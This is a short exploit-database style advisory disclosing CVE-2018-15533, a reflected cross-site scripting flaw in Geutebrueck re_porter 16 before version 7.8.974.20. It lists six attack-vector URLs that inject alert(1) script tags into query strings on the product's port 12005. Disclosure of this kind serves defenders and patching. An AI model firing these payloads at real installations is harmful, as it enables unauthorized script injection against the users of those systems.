Geutebruck re_porter 16 versions prior to 7.8.974.20 suffer from a cross site scripting vulnerability.
b0b475fbd6fb5fed80cd52abfd849ca4fe27f48426c1cc1f04fdabaf593d9cc3
# Exploit Title: Geutebrueck re_porter 16 reflected cross-site scripting
# Date: 03-08-2018
# Exploit Author: Kamil Suska
# Vendor Homepage:
https://www.geutebrueck.com//media/_public/products/descriptions_archive/en/re_porter_econ_7.74007_IA_DE_EN_FR_ES.pdf
# Version: prior 7.8.974.20
# CVE-2018-15533
[Attack Vectors]
http://example.com:12005/modifychannel/exec?vv9r7<script>
alert(1)</script>auubw=1
http://example.com:12005/images/IOMemoryPool.png?ebmf6<scrip
t>alert(1)</script>pmsih=1
http://example.com:12005/images/Statistics.png?q3dlx<script>
alert(1)</script>zjvdw=1
http://example.com:12005/images/GLIBBackground.jpg?itfvf<
script>alert(1)</script>irvnl=1
http://example.com:12005/images/MainMemoryPool.png?bzu69<
script>alert(1)</script>m2hhj=1
http://example.com:12005/images/ProcessMemory.png?f4d7j<
script>alert(1)</script>m5by3=
Pozdrawiam
Kamil Suska